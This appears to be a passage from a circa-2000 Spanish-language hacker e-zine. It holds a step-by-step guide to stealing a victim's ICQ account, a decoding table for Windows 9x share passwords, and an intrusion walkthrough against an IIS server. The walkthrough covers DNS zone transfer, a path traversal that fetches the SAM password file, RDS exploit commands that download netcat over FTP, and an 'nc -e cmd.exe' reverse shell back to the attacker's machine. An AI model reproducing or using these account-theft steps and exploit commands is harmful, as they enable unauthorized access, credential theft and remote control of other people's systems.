[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroup s\RandomGroup8] "Name"="50 Plus" "Number"=dword:00000009 "Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Ser ver1] "Host"="icq1.mirabilis.com" "Port"=dword:00000fa0
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\C anasta] "Type"="Command" "Command Line"="/ip:" "Path"="C:\\Program Files\\Canasta\\Canasta.exe" "URL"="http://ourworld.compuserve.com/homepages/mharte" "Version"=dword:0000000f
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\C onnectix VideoPhone] "Type"="Extension" "Format"="/p:tcp /ac:" "Extension"="cvp" "URL"="http://www.connectix.com/html/videophone.html" "Version"=dword:00000009
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\C u-Seeme] "Type"="Command" "Command Line"="" "Path"="C:\\CUSEEME\\CUSEEM32.EXE" "URL"="http://www.cu-seeme.com/" "Version"=dword:00000006
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\I RIS Phone] "Type"="Extension" "Format"="" "Extension"="iru" "URL"="http://irisphone.com/" "Version"=dword:0000000a
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\M icrosoft VChat] "Type"="ServerExtension" "Format"="1.1\\n-u 1 -a " "Extension"="vce" "NumParameters"=dword:00000002 "Server1"="vchat1.microsoft.com" "URL"="http://vchat1.microsoft.com" "Version"=dword:00000011
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\M icrosoft VChat\Param1] "ParamName"="World" "CanOtherChange"="No" "Param1"="#Compass" "Param2"="#BugWorld" "Param3"="#Fishbowl" "Param4"="#Lodge" "Param5"="#Lunar" "Param6"="#Lodge" "Param7"="#Practice" "Param8"="#RedDen" "Param9"="#TableTop"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\M icrosoft VChat\Param2] "ParamName"="Avatar" "CanOtherChange"="Yes" "Param1"="Amani" "Param2"="Anderson" "Param3"="Brb" "Param4"="Cat" "Param5"="Crab" "Param6"="Dancer" "Param7"="Dred" "Param8"="Duggan" "Param9"="Joey" "Param10"="Lulu"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\N etscape CoolTalk] "Type"="Command" "Command Line"="" "Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE" "URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/commu nication/cooltalk/index.html" "Version"=dword:00000004
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\R ikken on the Rockx] "Type"="ClientServer" "Client Command Line"="/CLIENT %i" "Server Command Line"="/SERVER" "Client Path"="C:\\Rikken\\Rikken.exe" "Server Path"="C:\\Rikken\\Rikken.exe" "URL"="http://www.dse.nl/~ramon/rikken/" "Version"=dword:00000017
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\V DOPhone] "Type"="Extension" "Format"="callto://" "Extension"="vdp" "URL"="http://www.vdo.net/download/" "Version"=dword:00000003
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\V idCall] "Type"="Command" "Command Line"="" "Path"="C:\\VidCall\\Corp.EXE" "URL"="http://www.access.digex.net/~vidcall/vidcall.html" "Version"=dword:00000008
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\W ebPhone] "Type"="Extension" "Format"="" "Extension"="wpc" "URL"="http://www.webphone.com/" "Version"=dword:00000007
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Q uake] "Type"="ClientServer" "Client Command Line"="-mpath +connect %i" "Server Command Line"="-mpath -listen" "Client Path"="c:\\quake_sw\\Q95.bat" "Server Path"="c:\\quake_sw\\Q95.bat" "Server1"="quake.xmisson.com" "URL"="http://www.idsoftware.com" "Version"=dword:00000010
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\V oxChat] "Type"="ServerCommand" "Format"="GROUPNAME=i PORT=15000" "Path"="C:\\Program Files\\VoxChat\\VoxChat.exe" "NumParameters"=dword:00000001 "Server1"="voxchat1.voxware.com" "Server2"="voxcha2.voxware.com" "URL"="http://www.voxchat.com/low/download.htm"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\V oxChat\Param1] "ParamName"="Room" "CanOtherChange"="No" "Param1"="#ICQ"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocati ons] "LastUpdate"=dword:00000000
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main] "SelectedCell"=dword:00000000 "AlwaysOnTop"="Yes" "LeftBarWidth"=dword:000000ad "RightBarWidth"=dword:000000ad "FloatBar-Left"=dword:00000255 "FloatBar-Right"=dword:00000307 "FloatBar-Top"=dword:00000033 "FloatBar-Bottom"=dword:000001f3 "State"="Floating" "Minimized"="No"
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows] "Response"=dword:008f00c9 "SearchWiz"=dword:006f00c0 "NotifyWiz"=dword:006f00c0 "posNovice"=dword:009300dc "posMOTD"=dword:00af00b7 "posMenuConfig"=dword:00a900e7 "RemoveUIN"=dword:00bb0108 "Message"=dword:008b004f "Security"=dword:007400b4 "Prefs"=dword:007f00ae "History"=dword:0096003a "File Request"=dword:009000f0 "FileTransfer"=dword:009700ae "Info"=dword:009300d2 "FetchUser"=dword:00e9010e "URL Message"=dword:00a00069 "Away"=dword:00bd00f7 "Chat Request"=dword:009f00dd "Contacts List"=dword:008300bd "Chat"=dword:008b00f5 "Phone"=dword:000a000a "Phone Call Request"=dword:007700e5
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search] "Place"=dword:00a400cc "Type"=dword:00000002 "Width"=dword:01880188
[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat] "ChatStyle Counter"=dword:00000003 "Pen Color"=dword:0080ffff "Back Color"=dword:00004000 "Send Focus"="Yes" "Enable Sounds"="Yes" "Name Bars"="Yes" "Always On Top"="No" "AutoColor"="No" "OverRide Format"="Yes" "Show Toolbar"="Yes" "State"=dword:00010000 "New Font Name"="Times New Roman" "Char Set"=dword:00000000 "IRCListWidth"=dword:00000006 "Font Pitch"=dword:00000012 "New Font Height"=dword:0000000e "Font Effects"=dword:00000000 "AutoColor 0"=dword:00000000 "AutoColor 1"=dword:00000080 "AutoColor 2"=dword:00008000 "AutoColor 3"=dword:00008080 "AutoColor 4"=dword:00800000 "AutoColor 5"=dword:00800080 "AutoColor 6"=dword:00808000 "AutoColor 7"=dword:00808080 "AutoColor 8"=dword:00c0c0c0 "AutoColor 9"=dword:000000ff "AutoColor 10"=dword:0000ff00 "AutoColor 11"=dword:0000ffff "AutoColor 12"=dword:00ff0000 "AutoColor 13"=dword:00ff00ff "AutoColor 14"=dword:00ffff00 "AutoColor 15"=dword:00ffffff "Place-Left"=dword:0000000a "Place-Right"=dword:000001fe "Place-Top"=dword:0000000a "Place-Bottom"=dword:0000021a "New LogFile name"="ICQChatLog.txt" "New SaveFile name"="ICQChatSave.txt" <----------Cortar aqui ----------------->
OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO Debes cambiar donde dice HACKEDUIN OJO OJO OJO OJO por el numero de ICQ de la victima OJO OJO OJO OJO de otra forma no servira para nada OJO OJO OJO OJO las entradas al registro!!!!!! OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO OJO
4. Guarda el archivo como Robo.reg 5. Abre robo.reg 6. Cuando te pregunte que si quieres agregar el archivo al registro le dices que SI 7. Abre el DBConverter (Viene con ICQ99) 8. Selecciona el uin que te acabas de robar 9. Cuando termine de convertir la lista deberia abrirse el ICQ automagicamente, si no lo hace, abrelo tu. 10. Si cuando el icq se abre el usuario actual no es el que te acabas de robar, haz click donde dice: ICQ --> Add/Change the active user --> Change the active user --> Selecciona el ICQ robado.
Ahora 2 cosas pueden pasar;
(1) El Icq de la victima se abre sin problemas y te queda registrado en tu Pc. (2) EL icq te pide la clave del usuario
Bien, si tu caso es el dos pueden haber pasado 2 cosas:
A. Tienen puesto el nivel de seguridad al maximo, para solucionar este problema tienes que bajarte el ICQ Crack y pillarte el pass
[ NOTA DEL EDITOR: ] [ El password del ICQ se encuentra en texto plano en el archivo UIN.DAT ] [ delante de la seccion UpdateInfoStatus . O con cualquier editor busca ] [ la cadena "Password" y delante veras el password. Yo_Soy ]
B. La victima todavia esta conectada, Si esto pasa no puedes hacer nada mas que esperar a que se desconecte para seguir con lo planeado.
11. Cuando puedas conectarte con el icq de la victima rapidamente cambia la clave de la victima.... Ok, tienes el control total sobre ese ICQ.....
MISION: CUMPLIDA!!!!!
Ok, espero que te haya gustado y hayas aprendido algo con esta sencilla pero poderosa forma de robar cuentas de icq, si tienes alguna duda, pregunta, comentario o lo que sea no dudes en hacermela llegar a prepucio@usa.net
Agradeciemientos: A mi papa, por pagarme la cuenta del telefono y a mi abuelo por haberme regalado mi primer Pc.... xD
Stele
|------------------------------------------------------------------| | Stele´s d0m41nz | | http://Stele.tripod.com | | If hacking is your religion, this is your church | -------------------------------------------------------------------|
Nota: Si vives en Colombia y sabes de H/C/P/V No dudes en mandarme un mail, tengo bastantes proyectos en mente que me gustaria compartir.
-09-( MS Windows Share Passwords )-------------------------------------------------------------------------------------------------------------------------RM-10] -----[ Yo_Soy ]----------------------------------------------------------------------------------------------------------------------------[yo_soy@raza-mexicana.org]
Esto es relativamente viejo, pero de todas maneras voy a hablar de esto. Supongo que alguna vez has visto los recursos compartidos de maquinas con Windows 9x. Pues bien, estos recursos pueden restringirse a ciertos usuarios utilizando contrase~as, en el cual tenemos dos opciones:
* Contrase~as de Solo Lectura * Contrase~as de Acceso Total
Bueno, en realidad son tres opciones (la tercera depende de la contrase~a).
Estas contrase~as son guardadas en el Registro de Windows, lo cual llena de ideas a mi malevolo cerebro ;). Los passwords se guardan en la siguiente entrada del registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
En esa entrada veremos los recursos compartidos (con el nombre que se le ha sido asignado). Supongamos que hemos compartido el directorio C:\TC y le hemos puesto "TC" como nombre de recurso compartido y le asignamos algunas contrase~as. La entrada de registro para dicho recurso, queda asi:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\TC] "Flags"=dword:00000103 "Type"=dword:00000000 "Path"="C:\\TC" "Parm2enc"=hex: "Parm1enc"=hex:73,df,1f "Remark"=""
Los valores se guardan asi:
Parm1enc = Contrase~a de acceso total Parm2enc = Contrase~a de solo lectura Path = Ubicacion del recurso compartido Remark = Comentario o descripcion
Los valores en Parm1enc y Parm2enc se guardan en binario, asi por ejemplo: "Parm1enc"=hex:73,df,1f
Separamos en la cadena en dos caracteres:
73 df 1f | | |-- R (tercer caracter) <--- Podemos darnos cuenta de que | |----- E (segundo caracter) la contrase~a es: FER |-------- F (primer caracter)
Los valores dependen de la posicion en la cual se encuentran, por ejemplo "73" es el primer caracter, por lo tanto buscamos en la primera columna, luego "df" es la segunda posicion, por lo tanto buscamos en la segunda columna de la tabla y asi sucesivamente.
---------[ TABLA DE VALORES ]----------
A =74 =db =0c =e7 =12 =e8 =95 =2b
B =77 =d8 =0f =e4 =11 =eb =96 =28
C =76 =d9 =0e =e5 =10 =ea =97 =29
D =71 =de =09 =e2 =17 =ed =90 =2e
E =70 =df =08 =e3 =16 =ec =91 =2f
F =73 =dc =0b =e0 =15 =ef =92 =2c
G =72 =dd =0a =e1 =14 =ee =93 =2d
H =7d =d2 =05 =ee =1b =e1 =9c =22
I =7c =d3 =04 =ef =1a =e0 =9d =23
J =7f =d0 =07 =ec =19 =e3 =9e =20
K =7e =d1 =06 =ed =18 =e2 =9f =21
L =79 =d6 =01 =ea =1f =e5 =98 =26
M =78 =d7 =00 =eb =1e =e4 =99 =27
N =7b =d4 =03 =e8 =1d =e7 =9a =24
O =7a =d5 =02 =e9 =1c =e6 =9b =25
P =65 =ca =1d =f6 =03 =f9 =84 =3a
Q =64 =cb =1c =f7 =02 =f8 =85 =3b
R =67 =c8 =1f =f4 =01 =fb =86 =38
S =66 =c9 =1e =f5 =00 =fa =87 =39
T =61 =ce =19 =f2 =07 =fd =80 =3e
U =60 =cf =18 =f3 =06 =fc =81 =3f
V =63 =cc =1b =f0 =05 =ff =82 =3c
W =62 =cd =1a =f1 =04 =fe =83 =3d
X =6d =c2 =15 =fe =0b =f1 =8c =32
Y =6c =c3 =14 =ff =0a =f0 =8d =33
Z =6f =c0 =17 =fc =09 =f3 =8e =30
space =15 =ba =6d =86 =73 =89 =f4 =4a
1 =04 =ab =7c =97 =62 =98 =e5 =5b
2 =07 =a8 =7f =94 =61 =9b =e6 =58
3 =06 =a9 =7e =95 =60 =9a =e7 =59
4 =01 =ae =79 =92 =67 =9d =e0 =5e
5 =00 =af =78 =93 =66 =9c =e1 =5f
6 =03 =ac =7b =90 =65 =9f =e2 =5c
7 =02 =ad =7a =91 =64 =9e =e3 =5d
8 =0d =a2 =75 =9e =6b =91 =ec =52
9 =0c =a3 =74 =9f =6a =90 =ed =53
0 =05 =aa =7d =96 =63 =99 =e4 =5a
~ =4b =e4 =33 =d8 =2d =d7 =aa =14
` =55 =fa =2d =c6 =33 =c9 =b4 =0a
! =14 =bb =6c =87 =72 =88 =f5 =4b
@ =75 =da =0d =e6 =13 =e9 =94 =2a
# =16 =b9 =6e =85 =70 =8a =f7 =49
$ =11 =be =69 =82 =77 =8d =f0 =4e
% =10 =bf =68 =83 =76 =8c =f1 =4f
^ =6b =c4 =13 =f8 =0d =f7 =8a =34
& =13 =bc =6b =80 =75 =8f =f2 =4c
* =1f =b0 =67 =8c =79 =83 =fe =40
( =1d =b2 =65 =8e =7b =81 =fc =42
) =1c =b3 =64 =8f =7a =80 =fd =43
- =18 =b7 =60 =8b =7e =84 =f9 =47
_ =6a =c5 =12 =f9 =0c =f6 =8b =35
+ =1e =b1 =66 =8d =78 =82 =ff =41
= =08 =a7 =70 =9b =6e =94 =e9 =57
[ =6e =c1 =16 =fd =08 =f2 =8f =31
] =68 =c7 =10 =fb =0e =f4 =89 =37
{ =4e =e1 =36 =dd =28 =d2 =af =11
} =48 =e7 =30 =db =2e =d4 =a9 =17
; =0e =a1 =76 =9d =68 =92 =ef =51
: =0f =a0 =77 =9c =69 =93 =ee =50
' =12 =bd =6a =81 =74 =8e =f3 =4d
" =17 =b8 =6f =84 =71 =8b =f6 =48
, =19 =b6 =61 =8a =7f =85 =f8 =46
< =09 =a6 =71 =9a =6f =95 =e8 =56
. =1b =b4 =63 =88 =7d =87 =fa =44
> =0b =a4 =73 =98 =6d =97 =ea =54
? =0a =a5 =72 =99 =6c =96 =eb =55
/ =1a =b5 =62 =89 =7c =86 =fb =45
\ =69 =c6 =11 =fa =0f =f5 =88 =36
| =49 =e6 =31 =da =2f =d5 =a8 =16
---------------------------------------
Un programa que lo realiza viene acompa~ado en esta revista (lanman.c)
-10-( IIS RDS Vulnerabity )------------------------------------------------------------------------------------------------------------------------------------------RM-10] -----[ 0x90 ]-----------------------------------------------------------------------------------------------------------------------------------------------------[0x90@s0d.org]
/* ESTE ARTICULO ES SOLO PARA FINES EDUCATIVOS, NI s0d NI EL AUTOR SE HACEN RESPONSABLES DE LAS ACCIONES DE LOS LECTORES DE ESTE ARTICULO, SI NO ESTA SATISFECHO CON ESTE ARREGLO LEGAL DEBERA BORRAR ESTE ARTICULO INMEDIATAMENTE. AL TENER ESTE ARTICULO EN SU PODER EL CAUSANTE NIEGA TODA RESPONSABILIDAD A s0d Y AL AUTOR POR LOS ACTOS PERPETRADOS POR EL MISMO CAUSANTE, ASI PUES SE NIEGA TODA RESPONSABILIDAD JURIDICA Y CIVIL A s0d Y AL AUTOR.
COPYRIGHT 2000 DE 0x90 Y Tha s0d Crew!!!!!!0x90 */
"If I was to hack some heavy metal I would work my way to
the low security level and try the backdoor!"
-- Zero Cool en Hackers
I. INTRODUCCION
Si alguna vez esa pelicula dijo algo cierto fue esa vez (vamos cuantos de ustedes han visto Unix correr sobre... una apple con RISC!!!!)
Soy 0x90 (NOP pa la raza) ... soy miembro y programador lider de s0d (www.s0d.org) y "groupie" de raza, ya que no he sido introducido formalmente al grupo, este articulo esta basado en tecnicas simples pero que funcionan perfectamente en cualquier tipo de institucion que tenga los requerimientos que se dan (creanme son pocos y 90% del tiempo se dan de todos modos).
El firewall se ha convertido en una bandera para detener a los hackers, "Estamos seguros tenemos un firewall" he oido decir muchas veces a clientes con sonrisas hasta que en 5 minutos hay un signo # en mi Eterm .. OoOoOoOpPpPpPPpSSSssSss!!!! ... no tan seguro huh? .. asi es soy un auditor de seguridad en internet, audito software y firewalls, asi pues puedo decir que un firewall comprado y puesto en la red nada mas asi sin configuracion es vulnerable a una gran cantidad de peque~as cosas que llevan a tener root en el server (o administrador en el caso de NT).
Asi pues estas tecnicas no son las avanzadas, ni de cerquita!, pero ayudan ayudan .. estas tecnicas son ense~adas a los tecnicos cuando entran a trabajar con nosotros y son nuevos en el underground hacking ...
NOTA: El hacker avanzado se va a reir de esto pero el que rie al ultimo rie mejor ... algunas de estas madres truenan IDS, que no es usado en Mexiko pero que tal en paises en europa y US (pueden decir GM, FORD, ERICCSSON, TELIA, TELENORDIA, etc).
II."THE BIG ENCHILADA" O "CHINGADOS NADA ESTA ABIERTO Y MI TRACEROUTE NO
JALA!"
Probablemente te hayas encontrado con un firewall, no es comun en Mexiko pero se esta haciendo comun en otros lugares (cuando van a dejar de poner ACL en sus pinches routers en lugar de poner un firewall .. pendejos).
Los programas usados para la realizacion de este articulo estan publicados en www.s0d.org en la seccion de articulos (el articulo ahi esta en ingles).
Como reconocer un firewall? que tal:
mastah@NOP# traceroute 192.0.0.1 10.0.0.254 10ms 10ms 10ms 10.2.190.6 100ms 100ms 112ms 10.190.1.45 300ms 320ms 230ms 192.0.0.254 * * * 192.0.0.254 * * * 192.0.0.254 * * * ^C mastah@NOP#
Okas esto parece ser un firewall, igual es un pendejo con ACL en sus routers o algo asi, entonces vamos a ver si es un firewall ...
mastah@NOP#d ig neverland.org
Registrant: Proffice AB (PROFFICE6-DOM) Box 70368 Stockholm, 107 24 SE
Domain Name: PROFFICE.COM
Administrative Contact:
Orgasm, Fake (FOR43) fake.orgasm@NEVELAND.ORG
Neverland SA de CV
Barril 15
Veindad del Chavo del 8
UGH
+55 15 lame-ass-number
Technical Contact, Zone Contact:
Komotaz, Hola (OHO999) Hola.Komotaz@NEVERLANG.ORG
Neverland SA de CV
Barril 16
Vecindad del Chavo del 8
UGH
+44 15 800-eat-shit
Billing Contact:
Orgasm, Fake (FOR43) fake.orgasm@NEVELAND.ORG
Neverland SA de CV
Barril 15
Veindad del Chavo del 8
UGH
+55 15 lame-ass-number
Record last updated on 29-Sep-1999. Record expires on 29-Sep-2001. Record created on 29-Sep-1999. Database last updated on 1-May-2000 03:33:58 EDT.
Domain servers in listed order:
DNS1.NEVERLAND.ORG 192.0.0.2 DNS2.NEVERLAND.ORG 192.10.1.1
mastah@NOP#
Okas el dns primario es dns1.neverland.org y el secundario dns2.neverland.org (doh!!!), okas asi pues
mastah@NOP# nslookup
Server: 10.0.0.1
hazkakita.kon.kulote.org
>server dns1.neverland.org
Server: 192.0.0.1
dns1.neverland.org
>ls -d neverland.org
[dns1.neverland.org]
$ORIGIN neverland.org.
@ 1D IN SOA dns1 ughgna.hijack.telelele.ug. (
2000012614 ; serial
8H ; refresh
2H ; retry
1W ; expiry
1D ) ; minimum
1D IN NS dns1
1D IN NS dns2.neverland.org.
1D IN MX 20 mail2
1D IN MX 10 mail1
learn 1D IN A 192.0.0.15.
x-edu 1D IN MX 10 mail.neverland.org
netmeetig 1D IN A 192.0.0.40
findme 1D IN NS dns1
fuck.edu 1D IN A 192.10.1.40
admnet 1D IN A 192.0.0.80
webmail 1D IN CNAME mail1
luvit 1D IN A 192.0.0.103
mail1 1D IN A webmail
dns1 1D IN A 192.0.0.2
www 1D IN A 192.0.0.90
gw 1D IN A 192.0.0.254
@ 1D IN SOA dns1 ughgna.hijack.telelele.ug. (
2000012614 ; serial
8H ; refresh
2H ; retry
1W ; expiry
1D ) ; minimum
>exit mastah@NOP#
okas asi pues vemos el IP 192.0.0.254 y se llama gw.neverland.org ... Hrmmm suena atractivo (igual y el wey le pone fw, si le puso asi le podemos gritar pendejo todos juntos y simplemente dejar de buscar el firewall)
Okas como hacemos la gracia de saber si es un firewall o un router?, okas podemos mandar un queso o nmap ... pero para que dejar nuestro IP en todo el firewall si podemos checar si es un router facilmente??? (recuerden que no es rafico mandar un paquete sin flags o con todas prendidas).
Para esta gracia vamos a usar una de mis herramientas favoritas, hping2. Este peque~o enano te deja poder checar reglas del firewall si sabes lo que esta haciendo (hasta te deja mandar fake IP ... };-P ), okas asi pues vamos a ver que gracias hacemos. Si es un router podemos apostar que 80% de las veces va a ser un CISCO, asi pues chequemos si tiene el puerto 2001 abierto:
masta@NOP# hping2 -S -p 2001 192.0.0.254 eth0 default routing interface selected (according to /proc) HPING 192.0.0.254 (eth0 192.0.0.254): S set, 40 headers + 0 data bytes 50 bytes from 192.0.0.254: flags=RA seq=0 ttl=41 id=59571 win=32736 rtt=172.3 ms 50 bytes from 192.0.0.254: flags=RA seq=1 ttl=41 id=59574 win=32736 rtt=167.3 ms --- 192.0.0.254 hping statistic --- 2 packets tramitted, 2 packets received, 0% packet loss round-trip min/avg/max = 167.3/169.8/172.3 ms
Aja ... cerrado (chequen como en flags este recibe (RA) que es Reset/Ack. Que se manda cuando esta el puerto cerrado (EEerrrmm para mas informacion sobre banderas chequen TCP/IP Illustrated de Richard Stevens)), okas ahora vamos a usar hping2 otra vez para poder ver si podemos desenmascarar el firewall ...
mastah@NOP# hping2 -1 192.0.0.15 eth0 default routing interface selected (according to /proc) HPING 192.0.0.254 (eth0 192.0.0.254): S set, 40 headers + 0 data bytes 50 bytes from 192.0.0.254(Administrativelly denied): seq=0 ttl=41 id=59571 win=32736 rtt=172.3 ms 50 bytes from 192.0.0.254(Administrativelly denied): seq=1 ttl=41 id=59574 win=32736 rtt=167.3 ms --- 192.0.0.254 hping statistic --- 2 packets tramitted, 2 packets received, 0% packet loss round-trip min/avg/max = 167.3/169.8/172.3 ms
Okas ahora sabemos que es un firewall, de aqui podemos ver que tipo de firewall es? ... errrmmm nop, nos deberia importar si queremos tronarlo? un poco aunque ya que estemos dentro igual y encontramos los archivos de configuracion y voila!!!. asi pues vamos aver que ondas con www ....
Para esto vamos a usar nc, (la version de unix y NT funcionan igual), el cuchillo suizo, se ha hablado mucho de esta herramienta tiene muchas funciones la que mas me gusta es que puedes tronar la conexion rapida y facilmente, esto funciona cuando mandas llamar un cgi que manda 15 minutos de mierda porque asi es programado .... ^C ^C!!! =) asi pues sigamos:
mastah@NOP#nc -vvn 192.0.0.90 80
HTTP/1.1 404 Object Not Found Server: Microsoft-IIS/4.0 Date: Thu, 29 Jun 2000 12:07:52 GMT Content-Type: text/html Content-Length: 102
NT huh?, okas queremos el archivo sam, podemos usar muchas exploits pero aqui voy a poner uno que casi no se ha hecho publico y es chido, el bug del compaq manager. El Compaq Web Manager tiene el bug de no checar .. asipues uno se puede escapar de donde esta y poder ver que ondas, okas antes que eso vamos a ver en que pinche drive estamos no?, usemos idq para eso:
mastah@NOP# nc -vvn 192.0.0.90 80
GET /I_OwN_Ya_BiAtCh.idq HTTP/1.0
The file C:\InetPub\WWWroot\I_OwN_Ya_BiAtCh.idq has not been found on this server
Okas! estamos en C:\, eso es chido porque a veces es todo un show (tuve un caso en que estaba en F pero cuando guardaba ago eso se guardaba en D asi que tuve que hacer dirs en todo el server para ver que ondas).
Okas suficiente esto no es un articulo sobre web hacking, asi pues usamos el compaq manager, para eso agarremos el explorer (asi es ... el netscape trata de ver el sam._ y se truena .. el explorer nop, igual podemos usar lynx, aunque para NT lo mejor para hackear es NT). Okas nos conectamos a 192.0.0.90:2301 y usamos el bug del ..
192.0.0.90:2301/../../../../../../../../../../../winnt/repair/sam._
Guarda el archivo .... usa l0phtcrack para tronar el passwd y ya tienes administrator en la maquina!, TIEMPO!!!!!!!!!!! puedes conectarte??? esta el puerto 139 cerrado? el puerto 21?? chingados que mal pedo!!! para que tengo esta madre???? no me sirve!!! antes de enojarte y borrar todo y patear la compu veamos algo:
III. BACK CONNECT O SI NO PUEDES CONECTARTE NI PEDO QUE EL SE CONECTE!
Asi es, como ejemplo voy a tomar que el server tiene msadc, lo cual es comun, asi pues vamos a ejecutar el exploit para el msadc, que que es el msadc? a viejos eso es web hacking ;-P algo tienen que leer en otros articulos de s0d/raza no???
Okas todavia estamos en linux o un NT con windump y un server ftp:
mastah@NOP# perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c ping 10.0.0.80
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt40 -> c: Success!
Podemos ver en tcpdump que los pings si llegan.
Asi pues nos emocionamos e intentamos la primera gracia, "Back ftp":
mastah@NOP# perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c "cd \%SystemRoot\% &&echo USERNAME>tmp&& echo PASSWD>>tmp && echo bin>>tmp && echo get nc.exe>>tmp && echo bye>>tmp && ftp -s:tmp 10.0.0.80 && attrib -r nc.exe && nc -e cmd.exe 10.0.0.80 2500"
Esperamos tantito y checamos el xferlog (en /var/log/xferlog) y nada .. ni madre ... no se conecto ... que paso?!?
Bueno igual y el adminstrador tiene un poco mas de medio cerebro y cerro el puerto 21 en salida para evitar los hacks de afuera para adentro de back connect!!, nos chingamos??? .. nop ni poquito!!!
Vamos a rebootear a Wintendo ... regreso!!!! ....
Para eso ya estamos en Wintendo y necesitan tener perl instalado (Active perl es chido .. lo puedes bajar de la red en www.activestate.com):
c:\0x90_tools\web\msadc> perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c net use Z: \\10.0.0.80\D$ NotMyPasswd /user:NOP\administrator
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt40 -> c: Success!
Chequen donde esta el truco, tiene que venir a checar las credenciales a esta maquina, asi pues debemos de poner que las credenciales son de esta maquin poniendo el nombre de nuestra maquina ANTES que el usuario en la opcion /user .... si no ni madres que jala =)
Ahora chequemos si se pudo la gracia:
c:\0x90_tools\web\msadc>perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c dir Z:\ > c:\inetpub\iissamples\dir.txt
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt40 -> c: Success!
Ahora chequemos el archivo con tu visor de web favorito:
Hrmmm se parece a tu drive??? chingas!!! SI ES!!!!!!!!!!!
Okas ya estamos dentro ahora que??, bueno baila tantito si quieres, emocionate, dame las gracias, visita la pagina de s0d y raza, ya??? todavia no??? nel ni madres yo le sigo sin ti entonces .... ya??? okas ahi va otra vez.
Lo que hacemos ahora es hacer que la maquina copie el nc.exe a el server y de ahi pues simplemente conseguir shell!!!:
c:\0x90_tools\web\msadc>perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c copy z:\0x90_tools\wintendo\nc.exe c:\nc.exe
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt40 -> c: Success!
Okas checa que lo haya hecho haciendo un dir a C:\ (tu puedes solo ya esta ahi el ejemplo antes peor con Z:\)
Esta!!, ok ahora que? bueno que tal si pones un nc en modod de escucha en tu maquina en un puerto alto? los puertos altos generalmente no esta cerrados, y si estan el puerto 53 o el 110 casi siempre estan abierto aunque yo mejor sugiero el puerto 8080 ya que a veces esta abierto para proxies =) ... okas .. aqui vamos.
c:\0x90_tools\wintendo>nc -vvn -l -p 8080 Listening on (Any) on port 8080
Okas ahora mandamos otro cmd exe (no te salgas de ese con ^C lo vas a necesitar) y manda una conexion de nc a tu maquina al puerto 8080, asi es todo al reves, ni pedo pero si el firewall no te deja entrar igual y si deja al server salir (error tipico al hacer las reglas del firewall).
c:\0x90_tools\web\msadc>perl -x msadc2.pl -- RDS smack v2 - rain forest puppy / ADM / wiretrip -- Type the command line you want to run (cmd /c assumed): cmd /c c:\nc.exe -n -e cmd.exe 10.0.0.80 8080
Step 1: Trying raw driver to btcustmr.mdb winnt -> c: d: e: f: g: h: winnt40 -> c: Success!
ahora veamos la otra consola:
NERVIOS NERVIOS NERVIOS NERVIOS NERVIOS!!!!!!!
